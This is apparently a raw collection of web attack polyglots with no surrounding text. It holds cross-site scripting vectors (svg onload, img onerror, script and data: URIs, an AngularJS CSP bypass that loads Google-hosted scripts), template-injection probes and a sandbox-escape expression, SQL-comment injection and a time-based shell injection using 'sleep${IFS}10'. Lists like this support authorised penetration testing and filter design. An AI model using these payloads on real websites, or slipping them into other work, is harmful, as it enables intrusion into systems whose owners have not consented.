<%00svg/onload=confirm`{{8*8}}`>*/'1 
Prénom?;sleep${IFS}10;'/*!90000or*/+/*">
PT"><svg/onload=alert(1)>;alert(1);//--alert(1)--

<script src="data:text/javascript,alert(document.domain)"></script>

Using Angular:
ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
"><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>

p3nt3st'"<u><i<a>>${7*7}{7*7}{{7*7}}%27%22%3E%3C%2527%2522%253E%253C\x27\x22\x3e\x3c\\x27\\x22\\x3e\\x3c$*{}[];%26|%23%20--%20-<!--p1n3
{{7*7}}${7*7}<%= 7*7 %>${{7*7}}#{7*7}
"><script>alert(1)</script><img src=x onerror=alert(1)>
{{0[a='constructor'][a]('alert(1)')()}}


{{$this}}{{__proto__}}{{7*7}}${7*7}${this}<%= 7*7 %>${{7*7}}#{7*7}"><script>alert(1)</script><img src=x onerror=alert(1)>

javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>